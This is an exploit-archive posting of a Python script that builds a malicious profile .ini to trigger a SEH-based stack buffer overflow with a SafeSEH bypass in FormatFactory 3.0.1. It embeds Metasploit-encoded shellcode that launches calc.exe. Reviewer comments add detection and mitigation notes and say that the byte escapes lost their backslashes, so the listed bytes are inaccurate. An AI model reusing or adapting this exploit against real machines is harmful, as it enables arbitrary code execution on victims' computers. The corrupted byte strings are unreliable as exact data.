
FormatFactory 3.0.1 Buffer Overflow

Posted on 21 November 2012

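#!/usr/bin/python
# Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow
# Version: <= 3.0.1
# Date: 2012-11-19
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.inshell.net
# Software Link: http://www.pcfreetime.com
# Tested on: Windows XP SP3 Professional German
# Notes: -
# Howto: Copy .ini to %USERPROFILE%My DocumentsFormatFactoryPicCustom
#
# Reviewer notes (defensive reading of this proof of concept):
# - Purpose: writes a picture-profile .ini whose "Type=" value is far longer
#   than a normal profile entry. The title describes a buffer overflow in
#   profile file handling; presumably the parser copies this value into a
#   fixed-size stack buffer without a length check -- confirm against the
#   vendor's fix.
# - Listing fidelity: the page extraction dropped the backslashes from the
#   byte-escape sequences and from the Windows path above. The strings are
#   reproduced exactly as the page shows them, so this listing is not
#   byte-accurate; do not derive byte signatures from it.
# - Written for Python 2, where pack() returns a str that can be
#   concatenated with the other string fields.
# - Detection: profile .ini files under the FormatFactory PicCustom
#   directory with an abnormally long "Type=" line or non-printable bytes;
#   FormatFactory spawning an unexpected child process (the demonstration
#   payload starts calc.exe).
# - Mitigation: treat profile files from untrusted sources as untrusted
#   input and check the vendor for a release newer than 3.0.1. The author
#   tested only on Windows XP SP3; DEP and SEHOP on later Windows versions
#   are the relevant hardening for this class of SEH overwrite.

from struct import pack

# Output file name (renamed from `file`, which shadowed the Python 2 builtin).
out_path = "profile.ini"

# Filler placed before the exception-handler record: 260 repetitions.
junk1 = "xCC" * 260
# Field written immediately before the handler pointer (the "next SEH" slot).
nseh = "xebx06x90x90"
# Named `eip` by the author, but it sits directly after the nSEH field, i.e.
# in the handler-pointer position of the record.
eip = pack('<L', 0x024C1923)  # CALL DWORD PTR SS:[EBP-C] at 0x024c1923 - SafeSEH Bypass
nops = "x90" * 10
# Trailing filler appended after the payload.
junk2 = "xCC" * 10000

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00'
shellcode = ("xbax68x3ex85x1fxd9xcaxd9x74x24xf4x58x29xc9" +
"xb1x33x31x50x12x83xe8xfcx03x38x30x67xeax44" +
"xa4xeex15xb4x35x91x9cx51x04x83xfbx12x35x13" +
"x8fx76xb6xd8xddx62x4dxacxc9x85xe6x1bx2cxa8" +
"xf7xadxf0x66x3bxafx8cx74x68x0fxacxb7x7dx4e" +
"xe9xa5x8ex02xa2xa2x3dxb3xc7xf6xfdxb2x07x7d" +
"xbdxccx22x41x4ax67x2cx91xe3xfcx66x09x8fx5b" +
"x57x28x5cxb8xabx63xe9x0bx5fx72x3bx42xa0x45" +
"x03x09x9fx6ax8ex53xe7x4cx71x26x13xafx0cx31" +
"xe0xd2xcaxb4xf5x74x98x6fxdex85x4dxe9x95x89" +
"x3ax7dxf1x8dxbdx52x89xa9x36x55x5ex38x0cx72" +
"x7ax61xd6x1bxdbxcfxb9x24x3bxb7x66x81x37x55" +
"x72xb3x15x33x85x31x20x7ax85x49x2bx2cxeex78" +
"xa0xa3x69x85x63x80x86xcfx2exa0x0ex96xbaxf1" +
"x52x29x11x35x6bxaax90xc5x88xb2xd0xc0xd5x74" +
"x08xb8x46x11x2ex6fx66x30x4dxeexf4xd8xbcx95" +
"x7cx7axc1")

# Single "Type=" entry: filler, handler record, NOPs, payload, trailing filler.
poc = "Type=" + junk1 + nseh + eip + nops + shellcode + junk2

try:
    print("[*] Creating exploit file... ")
    # Context manager closes the handle even if write() fails.
    with open(out_path, "w") as handle:
        handle.write(poc)
    print("[*] File successfully created!")
except (IOError, OSError):
    # Only I/O failures are reported here; the original bare `except:` also
    # swallowed unrelated errors such as KeyboardInterrupt.
    print("[!] Error while creating file!")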

 
